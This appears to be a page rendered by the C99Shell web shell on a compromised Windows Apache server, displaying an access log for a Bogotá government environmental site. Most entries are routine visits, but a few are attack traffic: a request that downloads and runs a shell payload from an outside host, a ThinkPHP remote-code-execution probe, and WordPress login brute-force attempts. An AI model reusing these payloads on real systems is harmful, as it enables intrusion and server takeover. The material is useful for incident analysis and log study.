!C99Shell v. 1.0 pre-release build #13!

Software: Apache. PHP/5.5.15 

uname -a: Windows NT SVR-DMZ 6.1 build 7600 (Windows Server 2008 R2 Enterprise Edition) i586 

SYSTEM 

Safe-mode: OFF (not secure)

E:\nuevo\apache\logs\   drwxrwxrwx
Free 7.34 GB of 239.26 GB (3.07%)
Detected drives: [ a ] [ c ] [ d ] [ e ] [ f ]
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     access.2023.03.17.log (6.14 MB)      -rw-rw-rw-
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
200.6.95.0 - - [17/Mar/2023:00:00:02 -0500] "GET /shell?cd+/tmp;rm+-rf+*;wget+update.rawupdater.cf/jaws;sh+/tmp/jaws HTTP/1.1" 404 1013
192.168.175.240 - - [17/Mar/2023:00:00:57 -0500] "GET / HTTP/1.1" 200 4720
172.22.2.4 - - [17/Mar/2023:00:00:16 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
192.168.175.240 - - [17/Mar/2023:00:01:57 -0500] "GET / HTTP/1.1" 200 4720
181.59.3.138 - - [17/Mar/2023:00:02:26 -0500] "GET /mujeres-que-reverdecen-secretaria-de-ambiente-anuncia-el-inicio-de-la-tercera-fase.html HTTP/1.1" 200 954
172.22.2.4 - - [17/Mar/2023:00:01:06 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 53914
192.168.175.240 - - [17/Mar/2023:00:02:57 -0500] "GET / HTTP/1.1" 200 4720
66.249.73.84 - - [17/Mar/2023:00:03:01 -0500] "-" 408 -
66.102.8.173 - - [17/Mar/2023:00:03:05 -0500] "GET /Publicaciones/SSFFS-09528-2021.zip HTTP/1.1" 404 232
216.245.221.92 - - [17/Mar/2023:00:03:46 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [17/Mar/2023:00:03:50 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42239
192.168.175.240 - - [17/Mar/2023:00:03:57 -0500] "GET / HTTP/1.1" 200 4720
186.113.70.198 - - [17/Mar/2023:00:04:54 -0500] "GET /170-animales-fueron-rescatados-por-el-distrito-en-la-localidad-de-antonio-narino.html HTTP/1.1" 200 1003
192.168.175.240 - - [17/Mar/2023:00:04:57 -0500] "GET / HTTP/1.1" 200 4720
172.22.2.4 - - [17/Mar/2023:00:05:00 -0500] "GET /BLA/boletinlegal/jurisprudencia/analisis/AnalisisT-606-15.docx HTTP/1.1" 304 -
192.168.175.240 - - [17/Mar/2023:00:05:57 -0500] "GET / HTTP/1.1" 200 4720
192.168.175.240 - - [17/Mar/2023:00:06:57 -0500] "GET / HTTP/1.1" 200 4720
172.22.2.4 - - [17/Mar/2023:00:06:06 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
152.61.192.232 - - [17/Mar/2023:00:07:46 -0500] "GET / HTTP/1.1" 200 319
192.168.175.240 - - [17/Mar/2023:00:07:57 -0500] "GET / HTTP/1.1" 200 4720
181.56.224.237 - - [17/Mar/2023:00:08:16 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml HTTP/1.1" 200 159798
172.22.2.4 - - [17/Mar/2023:00:06:56 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 56744
216.245.221.92 - - [17/Mar/2023:00:08:46 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [17/Mar/2023:00:08:50 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42239
192.168.175.240 - - [17/Mar/2023:00:08:57 -0500] "GET / HTTP/1.1" 200 4720
186.83.132.117 - - [17/Mar/2023:00:09:10 -0500] "-" 408 -
181.56.224.237 - - [17/Mar/2023:00:09:18 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml HTTP/1.1" 200 1276332
66.249.73.84 - - [17/Mar/2023:00:09:22 -0500] "-" 408 -
192.168.175.240 - - [17/Mar/2023:00:09:57 -0500] "GET / HTTP/1.1" 200 4720
192.168.175.240 - - [17/Mar/2023:00:10:57 -0500] "GET / HTTP/1.1" 200 4720
192.168.175.240 - - [17/Mar/2023:00:11:57 -0500] "GET / HTTP/1.1" 200 4720
192.168.175.240 - - [17/Mar/2023:00:12:57 -0500] "GET / HTTP/1.1" 200 4720
172.22.2.4 - - [17/Mar/2023:00:12:32 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 28619
172.22.2.4 - - [17/Mar/2023:00:11:55 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [17/Mar/2023:00:13:46 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [17/Mar/2023:00:13:49 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42239
192.168.175.240 - - [17/Mar/2023:00:13:57 -0500] "GET / HTTP/1.1" 200 4720
181.61.205.101 - - [17/Mar/2023:00:14:24 -0500] "GET /mujeres-que-reverdecen-secretaria-de-ambiente-anuncia-el-inicio-de-la-tercera-fase.html HTTP/1.1" 200 954
172.22.2.4 - - [17/Mar/2023:00:12:46 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 54414
186.84.90.234 - - [17/Mar/2023:00:14:49 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
186.84.90.234 - - [17/Mar/2023:00:14:49 -0500] "GET /galeria/galeria/jquery.fancybox.js?v=2.1.5 HTTP/1.1" 200 48706
186.84.90.234 - - [17/Mar/2023:00:14:49 -0500] "GET /BLA/boletinlegal/js/jquery.scrollShow.js HTTP/1.1" 200 4586
192.168.175.240 - - [17/Mar/2023:00:14:57 -0500] "GET / HTTP/1.1" 200 4720
31.13.115.6 - - [17/Mar/2023:00:15:23 -0500] "GET /images/24%20de%20febrero%20Sendero%20guadalupe%202.jpeg HTTP/1.1" 200 70964
192.168.175.240 - - [17/Mar/2023:00:15:57 -0500] "GET / HTTP/1.1" 200 4720
181.56.224.237 - - [17/Mar/2023:00:16:16 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml HTTP/1.1" 200 91375
192.168.175.240 - - [17/Mar/2023:00:16:57 -0500] "GET / HTTP/1.1" 200 4720
192.168.175.240 - - [17/Mar/2023:00:17:57 -0500] "GET / HTTP/1.1" 200 4720
124.156.192.98 - - [17/Mar/2023:00:18:42 -0500] "GET /galeria/galeria/fotos/2humedal-Burro2P.jpg HTTP/1.1" 200 8996
216.245.221.92 - - [17/Mar/2023:00:18:46 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [17/Mar/2023:00:18:49 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42239
199.16.157.183 - - [17/Mar/2023:00:18:57 -0500] "GET /secretaria-de-ambiente-impone-sancion-por-puntos-de-obra-sin-permiso-en-el-humedal-tibabuyes.html HTTP/1.1" 200 990
199.16.157.183 - - [17/Mar/2023:00:18:57 -0500] "GET /images/Sello%201%20JA-2.jpeg HTTP/1.1" 200 42236
192.168.175.240 - - [17/Mar/2023:00:18:57 -0500] "GET / HTTP/1.1" 200 4720
199.16.157.182 - - [17/Mar/2023:00:18:58 -0500] "GET /images/foto%202.jpg HTTP/1.1" 200 63300
199.16.157.180 - - [17/Mar/2023:00:18:58 -0500] "GET /tinguas-azules-secretaria-de-ambiente-atiende-alto-numero-de-reportes-de-aves-migratorias.html HTTP/1.1" 200 923
172.22.2.4 - - [17/Mar/2023:00:17:45 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
192.168.175.240 - - [17/Mar/2023:00:19:57 -0500] "GET / HTTP/1.1" 200 4720
172.22.2.4 - - [17/Mar/2023:00:18:36 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57141
201.245.192.253 - - [17/Mar/2023:00:20:50 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42193
66.249.73.84 - - [17/Mar/2023:00:20:53 -0500] "-" 408 -
201.245.192.253 - - [17/Mar/2023:00:20:53 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42903
152.201.93.154 - - [17/Mar/2023:00:20:56 -0500] "GET /%C3%82%C2%BFquieres-aprender-sobre-jardines-verticales-esta-es-tu-oportunidad.html HTTP/1.1" 200 925
192.168.175.240 - - [17/Mar/2023:00:20:57 -0500] "GET / HTTP/1.1" 200 4720
172.22.2.4 - - [17/Mar/2023:00:20:58 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9672
172.22.2.4 - - [17/Mar/2023:00:20:58 -0500] "GET /BLA/boletinlegal/styles2.css HTTP/1.1" 200 1838
172.22.2.4 - - [17/Mar/2023:00:20:58 -0500] "GET /BLA/boletinlegal/js/ajax_actos.js HTTP/1.1" 200 1322
172.22.2.4 - - [17/Mar/2023:00:20:58 -0500] "GET /BLA/boletinlegal/niceforms-default.css HTTP/1.1" 200 6694
172.22.2.4 - - [17/Mar/2023:00:20:58 -0500] "GET /BLA/boletinlegal/style.css HTTP/1.1" 200 9406
172.22.2.4 - - [17/Mar/2023:00:20:58 -0500] "GET /BLA/boletinlegal/niceforms.js HTTP/1.1" 200 22876
172.22.2.4 - - [17/Mar/2023:00:20:58 -0500] "GET /BLA/boletinlegal/js/lib.js HTTP/1.1" 200 6474
172.22.2.4 - - [17/Mar/2023:00:20:58 -0500] "GET /BLA/boletinlegal/js/popup.js HTTP/1.1" 200 1270
172.22.2.4 - - [17/Mar/2023:00:20:58 -0500] "GET /BLA/boletinlegal/js/jquery1.js HTTP/1.1" 200 29846
172.22.2.4 - - [17/Mar/2023:00:20:58 -0500] "GET /BLA/boletinlegal/images/cabezote%20BLEGAL.jpg HTTP/1.1" 200 118164
172.22.2.4 - - [17/Mar/2023:00:20:58 -0500] "GET /BLA/boletinlegal/images/subscribe-icon-big.png HTTP/1.1" 200 47702
172.22.2.4 - - [17/Mar/2023:00:20:58 -0500] "GET /BLA/boletinlegal/images/historia.png HTTP/1.1" 200 52775
172.22.2.4 - - [17/Mar/2023:00:20:58 -0500] "GET /BLA/boletinlegal/images/registro-usuarios.png HTTP/1.1" 200 8106
172.22.2.4 - - [17/Mar/2023:00:20:58 -0500] "GET /BLA/boletinlegal/images/green-yellow-blue-pink-th.png HTTP/1.1" 200 7394
172.22.2.4 - - [17/Mar/2023:00:20:58 -0500] "GET /BLA/boletinlegal/images/tel.png HTTP/1.1" 200 14477
172.22.2.4 - - [17/Mar/2023:00:20:58 -0500] "GET /BLA/boletinlegal/images/icono-email.png HTTP/1.1" 200 5544
172.22.2.4 - - [17/Mar/2023:00:20:58 -0500] "GET /BLA/boletinlegal/images/body_bg.jpg HTTP/1.1" 200 1601
172.22.2.4 - - [17/Mar/2023:00:20:58 -0500] "GET /BLA/boletinlegal/images/menu_lft.gif HTTP/1.1" 200 1713
172.22.2.4 - - [17/Mar/2023:00:20:58 -0500] "GET /BLA/boletinlegal/images/menu_rght.gif HTTP/1.1" 200 1627
172.22.2.4 - - [17/Mar/2023:00:20:58 -0500] "GET /BLA/boletinlegal/images/bg_top.jpg HTTP/1.1" 200 522
172.22.2.4 - - [17/Mar/2023:00:20:59 -0500] "GET /BLA/boletinlegal/images/menu_bg.jpg HTTP/1.1" 200 620
172.22.2.4 - - [17/Mar/2023:00:20:59 -0500] "GET /BLA/boletinlegal/images/footer_bg.jpg HTTP/1.1" 200 586
172.22.2.4 - - [17/Mar/2023:00:20:59 -0500] "GET /BLA/boletinlegal/images/text.jpg HTTP/1.1" 200 568
172.22.2.4 - - [17/Mar/2023:00:20:59 -0500] "GET /BLA/boletinlegal/images/footer_bg_l.jpg HTTP/1.1" 200 776
172.22.2.4 - - [17/Mar/2023:00:20:59 -0500] "GET /BLA/boletinlegal/images/hover.jpg HTTP/1.1" 200 640
172.22.2.4 - - [17/Mar/2023:00:20:59 -0500] "GET /BLA/boletinlegal/img/0.png HTTP/1.1" 200 110
172.22.2.4 - - [17/Mar/2023:00:20:59 -0500] "GET /BLA/boletinlegal/img/select-left.png HTTP/1.1" 200 263
172.22.2.4 - - [17/Mar/2023:00:20:59 -0500] "GET /BLA/boletinlegal/img/select-right.png HTTP/1.1" 200 44019
172.22.2.4 - - [17/Mar/2023:00:20:59 -0500] "GET /BLA/boletinlegal/img/button-left.png HTTP/1.1" 200 57071
172.22.2.4 - - [17/Mar/2023:00:20:59 -0500] "GET /BLA/boletinlegal/img/button.png HTTP/1.1" 200 43241
172.22.2.4 - - [17/Mar/2023:00:20:59 -0500] "GET /BLA/boletinlegal/img/button-right.png HTTP/1.1" 200 57878
172.22.2.4 - - [17/Mar/2023:00:20:59 -0500] "GET /BLA/boletinlegal/favicon.ico HTTP/1.1" 404 1326
172.22.2.4 - - [17/Mar/2023:00:21:12 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=autos&no=&usuario=&sector=AIRE&fecha=1990&resuelve= HTTP/1.1" 200 626
172.22.2.4 - - [17/Mar/2023:00:21:17 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=resoluciones&no=&usuario=&sector=AIRE&fecha=1990&resuelve= HTTP/1.1" 200 626
172.22.2.4 - - [17/Mar/2023:00:21:24 -0500] "GET /BLA/boletinlegal/normativa.php HTTP/1.1" 200 8333
172.22.2.4 - - [17/Mar/2023:00:21:25 -0500] "GET /BLA/boletinlegal/js/ajax_normativa.js HTTP/1.1" 200 1154
172.22.2.4 - - [17/Mar/2023:00:21:29 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9672
192.168.175.240 - - [17/Mar/2023:00:21:57 -0500] "GET / HTTP/1.1" 200 4720
192.168.175.240 - - [17/Mar/2023:00:22:57 -0500] "GET / HTTP/1.1" 200 4720
152.61.128.50 - - [17/Mar/2023:00:23:46 -0500] "GET / HTTP/1.1" 200 319
216.245.221.92 - - [17/Mar/2023:00:23:46 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [17/Mar/2023:00:23:50 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42239
192.168.175.240 - - [17/Mar/2023:00:23:57 -0500] "GET / HTTP/1.1" 200 4720
198.74.59.35 - - [17/Mar/2023:00:24:00 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
198.74.59.35 - - [17/Mar/2023:00:24:00 -0500] "GET /BLA/boletinlegal/js/jquery.scrollShow.js HTTP/1.1" 200 4586
198.74.59.35 - - [17/Mar/2023:00:24:00 -0500] "GET /galeria/galeria/jquery.fancybox.js?v=2.1.5 HTTP/1.1" 200 48706
198.74.59.35 - - [17/Mar/2023:00:24:01 -0500] "GET /BLA/boletinlegal/notificaciones.php HTTP/1.1" 200 8116
198.74.59.35 - - [17/Mar/2023:00:24:01 -0500] "GET /BLA/boletinlegal/styles2.css HTTP/1.1" 200 1838
198.74.59.35 - - [17/Mar/2023:00:24:01 -0500] "GET /BLA/boletinlegal/js/jquery.js HTTP/1.1" 200 57254
198.74.59.35 - - [17/Mar/2023:00:24:01 -0500] "GET /BLA/boletinlegal/js/jquery.scrollTo-min.js HTTP/1.1" 200 1150
198.74.59.35 - - [17/Mar/2023:00:24:01 -0500] "GET /BLA/boletinlegal/images/pdf.gif HTTP/1.1" 200 567
198.74.59.35 - - [17/Mar/2023:00:24:01 -0500] "GET /BLA/boletinlegal/images/menu_bg.jpg HTTP/1.1" 200 620
198.74.59.35 - - [17/Mar/2023:00:24:02 -0500] "GET /BLA/boletinlegal/images/background.gif HTTP/1.1" 200 -
181.56.224.237 - - [17/Mar/2023:00:24:21 -0500] "GET /sipse/faces/javax.faces.resource/images/ui-bg_flat_0_2d5972_40x100.png?ln=primefaces-aristo HTTP/1.1" 304 -
181.56.224.237 - - [17/Mar/2023:00:24:21 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml HTTP/1.1" 200 43960
181.56.224.237 - - [17/Mar/2023:00:24:22 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
181.56.224.237 - - [17/Mar/2023:00:24:22 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.56.224.237 - - [17/Mar/2023:00:24:22 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.56.224.237 - - [17/Mar/2023:00:24:22 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.56.224.237 - - [17/Mar/2023:00:24:22 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.56.224.237 - - [17/Mar/2023:00:24:23 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.56.224.237 - - [17/Mar/2023:00:24:23 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.56.224.237 - - [17/Mar/2023:00:24:23 -0500] "GET /sipse/css/imagen/contrasena.png HTTP/1.1" 404 383
181.56.224.237 - - [17/Mar/2023:00:24:23 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultar.xhtml HTTP/1.1" 200 37323
181.56.224.237 - - [17/Mar/2023:00:24:24 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultar.xhtml HTTP/1.1" 200 37323
181.56.224.237 - - [17/Mar/2023:00:24:24 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultar.xhtml HTTP/1.1" 200 37323
181.56.224.237 - - [17/Mar/2023:00:24:24 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultar.xhtml HTTP/1.1" 200 37323
181.56.224.237 - - [17/Mar/2023:00:24:28 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultar.xhtml HTTP/1.1" 200 12838
181.56.224.237 - - [17/Mar/2023:00:24:31 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultar.xhtml HTTP/1.1" 200 165257
181.56.224.237 - - [17/Mar/2023:00:24:32 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
181.56.224.237 - - [17/Mar/2023:00:24:32 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.56.224.237 - - [17/Mar/2023:00:24:32 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.56.224.237 - - [17/Mar/2023:00:24:32 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.56.224.237 - - [17/Mar/2023:00:24:32 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.56.224.237 - - [17/Mar/2023:00:24:32 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.56.224.237 - - [17/Mar/2023:00:24:32 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.56.224.237 - - [17/Mar/2023:00:24:32 -0500] "GET /sipse/css/imagen/contrasena.png HTTP/1.1" 404 383
192.168.175.240 - - [17/Mar/2023:00:24:57 -0500] "GET / HTTP/1.1" 200 4720
172.22.2.4 - - [17/Mar/2023:00:25:04 -0500] "GET /BLA/boletinlegal/Circulares/2022/CIRCULAR%20No.%2000004%20DEL%2019%20DE%20MAYO%20DEL%202022.pdf HTTP/1.1" 304 -
172.22.2.4 - - [17/Mar/2023:00:23:35 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [17/Mar/2023:00:24:09 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 49744
192.168.175.240 - - [17/Mar/2023:00:25:57 -0500] "GET / HTTP/1.1" 200 4720
172.22.2.4 - - [17/Mar/2023:00:24:26 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 50654
192.168.175.240 - - [17/Mar/2023:00:26:57 -0500] "GET / HTTP/1.1" 200 4720
192.168.175.240 - - [17/Mar/2023:00:27:57 -0500] "GET / HTTP/1.1" 200 4720
185.119.81.105 - - [17/Mar/2023:00:28:21 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.105 - - [17/Mar/2023:00:28:23 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3670
216.245.221.92 - - [17/Mar/2023:00:28:46 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [17/Mar/2023:00:28:49 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42239
192.168.175.240 - - [17/Mar/2023:00:28:57 -0500] "GET / HTTP/1.1" 200 4720
192.168.175.240 - - [17/Mar/2023:00:29:57 -0500] "GET / HTTP/1.1" 200 4720
201.245.192.253 - - [17/Mar/2023:00:30:51 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42193
201.245.192.253 - - [17/Mar/2023:00:30:53 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42903
192.168.175.240 - - [17/Mar/2023:00:30:57 -0500] "GET / HTTP/1.1" 200 4720
172.22.2.4 - - [17/Mar/2023:00:29:25 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [17/Mar/2023:00:30:16 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 54798
192.168.175.240 - - [17/Mar/2023:00:31:57 -0500] "GET / HTTP/1.1" 200 4720
192.168.175.240 - - [17/Mar/2023:00:32:57 -0500] "GET / HTTP/1.1" 200 4720
216.245.221.92 - - [17/Mar/2023:00:33:46 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [17/Mar/2023:00:33:49 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42239
192.168.175.240 - - [17/Mar/2023:00:33:57 -0500] "GET / HTTP/1.1" 200 4720
185.119.81.103 - - [17/Mar/2023:00:34:06 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.103 - - [17/Mar/2023:00:34:07 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3670
64.124.8.23 - - [17/Mar/2023:00:34:13 -0500] "-" 408 -
192.168.175.240 - - [17/Mar/2023:00:34:57 -0500] "GET / HTTP/1.1" 200 4720
192.168.175.240 - - [17/Mar/2023:00:35:57 -0500] "GET / HTTP/1.1" 200 4720
66.249.75.113 - - [17/Mar/2023:00:35:59 -0500] "-" 408 -
172.22.2.4 - - [17/Mar/2023:00:35:15 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
192.168.175.240 - - [17/Mar/2023:00:36:57 -0500] "GET / HTTP/1.1" 200 4720
172.22.2.4 - - [17/Mar/2023:00:36:06 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 54798
192.168.175.240 - - [17/Mar/2023:00:37:57 -0500] "GET / HTTP/1.1" 200 4720
186.29.50.54 - - [17/Mar/2023:00:37:58 -0500] "GET /%C3%82%C2%BFquieres-aprender-sobre-jardines-verticales-esta-es-tu-oportunidad.html HTTP/1.1" 200 925
216.245.221.92 - - [17/Mar/2023:00:38:46 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [17/Mar/2023:00:38:48 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42239
192.168.175.240 - - [17/Mar/2023:00:38:57 -0500] "GET / HTTP/1.1" 200 4720
17.241.75.159 - - [17/Mar/2023:00:39:15 -0500] "-" 408 -
192.168.175.240 - - [17/Mar/2023:00:39:57 -0500] "GET / HTTP/1.1" 200 4720
201.245.192.253 - - [17/Mar/2023:00:40:50 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42193
66.249.73.86 - - [17/Mar/2023:00:40:54 -0500] "-" 408 -
201.245.192.253 - - [17/Mar/2023:00:40:54 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42903
192.168.175.240 - - [17/Mar/2023:00:40:57 -0500] "GET / HTTP/1.1" 200 4720
192.168.175.240 - - [17/Mar/2023:00:41:57 -0500] "GET / HTTP/1.1" 200 4720
172.22.2.4 - - [17/Mar/2023:00:41:05 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
192.168.175.240 - - [17/Mar/2023:00:42:57 -0500] "GET / HTTP/1.1" 200 4720
172.22.2.4 - - [17/Mar/2023:00:41:56 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58297
216.245.221.92 - - [17/Mar/2023:00:43:46 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [17/Mar/2023:00:43:47 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42239
192.168.175.240 - - [17/Mar/2023:00:43:57 -0500] "GET / HTTP/1.1" 200 4720
186.155.13.70 - - [17/Mar/2023:00:44:25 -0500] "GET /%C3%82%C2%BFquieres-aprender-sobre-jardines-verticales-esta-es-tu-oportunidad.html HTTP/1.1" 200 925
192.168.175.240 - - [17/Mar/2023:00:44:57 -0500] "GET / HTTP/1.1" 200 4720
192.168.175.240 - - [17/Mar/2023:00:45:57 -0500] "GET / HTTP/1.1" 200 4720
192.168.175.240 - - [17/Mar/2023:00:46:57 -0500] "GET / HTTP/1.1" 200 4720
157.55.39.206 - - [17/Mar/2023:00:47:12 -0500] "GET /mujeres-que-reverdecen-secretaria-de-ambiente-anuncia-el-inicio-de-la-tercera-fase.html HTTP/1.1" 200 954
34.91.34.116 - - [17/Mar/2023:00:47:14 -0500] "GET /inventario-de-emisiones-2020-transporte-publico-sitp-redujo-emisiones-de-pm-2-5-en-un-37.html HTTP/1.1" 200 925
192.168.175.240 - - [17/Mar/2023:00:47:57 -0500] "GET / HTTP/1.1" 200 4720
34.91.34.116 - - [17/Mar/2023:00:47:59 -0500] "GET /inventario-de-emisiones-2020-transporte-publico-sitp-redujo-emisiones-de-pm-2-5-en-un-37.html HTTP/1.1" 200 925
172.22.2.4 - - [17/Mar/2023:00:46:55 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [17/Mar/2023:00:47:37 -0500] "GET /BLA/boletinlegal/index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21 HTTP/1.1" 200 28619
216.245.221.92 - - [17/Mar/2023:00:48:46 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [17/Mar/2023:00:48:46 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42239
192.168.175.240 - - [17/Mar/2023:00:48:57 -0500] "GET / HTTP/1.1" 200 4720
172.22.2.4 - - [17/Mar/2023:00:47:46 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 53914
192.168.175.240 - - [17/Mar/2023:00:49:57 -0500] "GET / HTTP/1.1" 200 4720
192.168.175.240 - - [17/Mar/2023:00:50:57 -0500] "GET / HTTP/1.1" 200 4720
192.168.175.240 - - [17/Mar/2023:00:51:57 -0500] "GET / HTTP/1.1" 200 4720
192.168.175.240 - - [17/Mar/2023:00:52:57 -0500] "GET / HTTP/1.1" 200 4720
216.245.221.92 - - [17/Mar/2023:00:53:46 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [17/Mar/2023:00:53:45 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42239
192.168.175.240 - - [17/Mar/2023:00:53:57 -0500] "GET / HTTP/1.1" 200 4720
172.22.2.4 - - [17/Mar/2023:00:52:45 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
192.168.175.240 - - [17/Mar/2023:00:54:57 -0500] "GET / HTTP/1.1" 200 4720
152.61.192.232 - - [17/Mar/2023:00:54:58 -0500] "GET /arcgis/services/Calidad_del_Agua_WQI/MapServer/WMSServer?request=GetCapabilities&service=WMS HTTP/1.1" 503 1020
152.61.192.232 - - [17/Mar/2023:00:54:59 -0500] "GET /arcgis/services/Calidad_del_Agua_WQI/MapServer/WMSServer?SERVICE=WMS&REQUEST=GetCapabilities HTTP/1.1" 503 1020
152.61.192.232 - - [17/Mar/2023:00:54:59 -0500] "GET /arcgis/services/Calidad_del_Agua_WQI/MapServer/WMSServer?WMTVER=1.0.0&REQUEST=capabilities HTTP/1.1" 503 1020
172.22.2.4 - - [17/Mar/2023:00:53:36 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57935
